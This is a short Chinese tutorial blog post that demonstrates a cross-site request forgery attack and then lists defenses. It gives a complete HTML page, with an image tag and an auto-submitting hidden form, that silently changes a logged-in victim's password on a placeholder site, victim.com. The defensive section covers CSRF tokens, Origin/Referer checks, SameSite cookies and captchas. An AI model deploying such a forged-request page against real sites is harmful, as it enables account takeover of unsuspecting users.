网络安全:发起一次CSRF攻击!

一、如何发起一次CSRF攻击

1、目标网站信息:

复制代码
接口地址:https://victim.com/change-password
请求类型:get/post
接受参数:password

2、编写一个网页

html 复制代码
<!DOCTYPE html>
<html>
	<body>
		<!-- GET类型的CSRF -->
		<img src="https://victim.com/change-password?password=vme50">
		<!-- POST类型的CSRF -->
		 <form action="https://victim.com/change-password" method=POST>
		    <input type="hidden" name="password" value="vme50" />
		</form>
		<script> document.forms[0].submit(); </script> 
	</body>
</html>

3、诱导用户打开我们的网页

用户在已经登录了https://victim.com这个网站的情况下打开我们的网站,代码会自动发起网络请求,将受害者的账号密码修改为我们设置的值

二、防护策略

1、使用 CSRF Token(推荐):

在每个表单提交或敏感操作中包含一个随机生成的 CSRF Token,并将其与用户的会话关联起来。

服务器在接收到请求时验证 CSRF Token 的有效性,如果不匹配,则拒绝请求。

这样可以防止攻击者伪造请求,因为攻击者无法获取有效的 CSRF Token。

2、同源检测:

① 验证请求头:在服务器端验证请求头中的 Referer 字段或 Origin 字段,确保请求来自合法的源

② 验证域名:在服务器端对请求进行同源检测,只接受来自同一域名下的请求

③ 对在本域发起的攻击无效

将敏感的 Cookie 设置为 SameSite 属性为 Strict 或 Lax,限制其在跨站点请求中的发送,从而减少 CSRF 攻击的风险。

4、二次确认

① 验证码:对于敏感操作,可以要求用户输入验证码进行验证,以确保请求是由真实用户发起的

相关推荐
炎码工坊1 小时前
API网关Kong的鉴权与限流:高并发场景下的核心实践
安全·网络安全·微服务·云原生·系统安全
炎码工坊2 小时前
云原生安全实战:API网关Envoy的鉴权与限流详解
安全·网络安全·微服务·云原生·系统安全
枷锁—sha2 小时前
【DVWA系列】——xss(Reflected)——Medium详细教程
前端·网络·web安全·网络安全·xss
'tubug'2 小时前
XSS(跨站脚本攻击)详解
安全
Clownseven3 小时前
云防火墙(安全组)配置指南:从入门到精通端口开放 (2025)
服务器·安全
2501_915373889 小时前
Redis线程安全深度解析:单线程模型的并发智慧
数据库·redis·安全
恰薯条的屑海鸥12 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十五期-URL重定向模块)
学习·安全·web安全·渗透测试·网络安全学习
Tipray200613 小时前
让敏感数据在流转与存储中始终守护在安全范围
安全
前端页面仔14 小时前
易语言是什么?易语言能做什么?
开发语言·安全
Guheyunyi21 小时前
监测预警系统重塑隧道安全新范式
大数据·运维·人工智能·科技·安全